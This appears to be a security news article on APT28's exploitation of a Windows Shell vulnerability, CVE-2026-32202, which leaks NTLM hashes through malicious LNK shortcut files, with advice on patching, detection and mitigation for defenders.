APT28 Exploiting Windows Shell Flaw to Steal NTLM Credentials

Microsoft confirmed Sunday that a Windows Shell vulnerability is being actively exploited in the wild—and the attackers are Russia's APT28. The flaw, CVE-2026-32202, stems from an incomplete patch that left a credential theft vector wide open even after Microsoft's February fix, according to The Hacker News.

Security researchers at Akamai discovered that while Microsoft addressed the remote code execution risk in CVE-2026-21510, the patch failed to block NTLM hash leakage. APT28—also tracked as Fancy Bear, Forest Blizzard, and Pawn Storm—has weaponized this gap in campaigns targeting Ukraine and European Union nations. This attack pattern resembles tactics seen in the group's Operation Neusploit campaign earlier this year.

How the Attack Works

The exploit requires no clicks. When a victim opens a folder containing a malicious LNK shortcut file, Windows Explorer automatically attempts to render the file's icon. If that icon path points to an attacker-controlled UNC path, Windows initiates an SMB connection to resolve it—triggering an NTLM authentication handshake without any user interaction.

"The victim machine was still authenticating to the attacker's server," Akamai researcher Maor Dahan explained. "APT28 leverages the Windows Shell namespace parsing mechanism to load a dynamic-link library from a remote server using a UNC path."

This sends the victim's Net-NTLMv2 credential hash directly to the attacker's server. From there, attackers can crack the hash offline or use it in relay attacks to authenticate to other systems on the network.

The attack chain combines CVE-2026-32202 with CVE-2026-21513, an MSHTML Framework protection bypass (CVSS 8.8), to defeat Microsoft Defender SmartScreen and achieve code execution. This mirrors tactics we covered in the PhantomCore campaign that similarly chained multiple vulnerabilities against Russian-speaking targets.

An Incomplete Patch Created the Gap

Microsoft originally patched CVE-2026-21510 (CVSS 8.8) in February 2026 after APT28 exploited it as a zero-day. That fix stopped remote code execution through malicious shortcut files. But Akamai's analysis found the patch left the authentication coercion pathway intact.

CVE-2026-32202 carries a modest CVSS score of 4.3—appropriate for information disclosure but misleading given the real-world implications. Stolen NTLM hashes enable lateral movement, privilege escalation, and persistent access. In enterprise environments with Active Directory, a single compromised hash can cascade into full domain compromise—a risk we've seen exploited in Microsoft Entra ID attacks this month.

CISA added CVE-2026-21510 to its Known Exploited Vulnerabilities catalog in February, requiring federal agencies to patch by March 3. The new bypass means organizations that patched on schedule may still be vulnerable if they haven't applied April's cumulative updates.

APT28's December Campaign

According to CERT-UA and Akamai's research, APT28 exploited these vulnerabilities in December 2025 attacks against Ukrainian government entities and EU diplomatic targets. The campaigns used weaponized LNK files likely delivered via spear-phishing emails.

This follows APT28's established playbook. The group—attributed to Russia's GRU military intelligence—consistently targets diplomatic and military entities in nations supporting Ukraine. We've tracked their credential harvesting operations across the Balkans and Middle East using similar techniques.

The December campaign went undetected until Akamai's disclosure, highlighting how nation-state actors can operate in the gap between initial exploitation and patch release.

Who Needs to Act Now

All Windows systems running the Shell component are affected:

• Windows 10 (all supported versions)
• Windows 11 (all versions)
• Windows Server 2016, 2019, 2022, and 2025

Organizations should apply April 2026 Patch Tuesday updates immediately. The combination of confirmed nation-state exploitation, zero-click attack vector, and credential theft makes this a high-priority fix regardless of the numerical CVSS score. Network security vendors including FortiGuard have already released IPS signatures to detect exploitation attempts.

Detection and Mitigation

Beyond patching, security teams should:

1. Monitor outbound SMB traffic to external IP addresses—legitimate SMB rarely leaves the network perimeter
2. Block outbound SMB (port 445) at the firewall for systems that don't need external file sharing
3. Enforce NTLMv2 restrictions or migrate to Kerberos-only authentication where feasible
4. Review logs for suspicious LNK file access in user directories, particularly Downloads and email attachment folders
5. Implement application whitelisting to restrict execution from high-risk locations

For organizations in sectors APT28 typically targets—government, defense, energy, and diplomatic entities—consider this an elevated threat requiring immediate action.

Why This Matters

Incomplete patches are an underappreciated attack surface. Vendors fix the most obvious vulnerability, but determined attackers probe for residual weaknesses. APT28 found one that turned a patched RCE into persistent credential theft capability.

The low CVSS score obscures real risk. A 4.3 suggests low priority, but stolen NTLM hashes have enabled some of the most damaging breaches in recent memory. Score-based patching prioritization continues to fail organizations when it ignores active exploitation context.

Microsoft's Sunday advisory update—acknowledging exploitation days after initial publication—indicates the company confirmed APT28 activity and chose to warn defenders publicly. That's an implicit call to action. Organizations still running vulnerable systems should treat this as the emergency it is.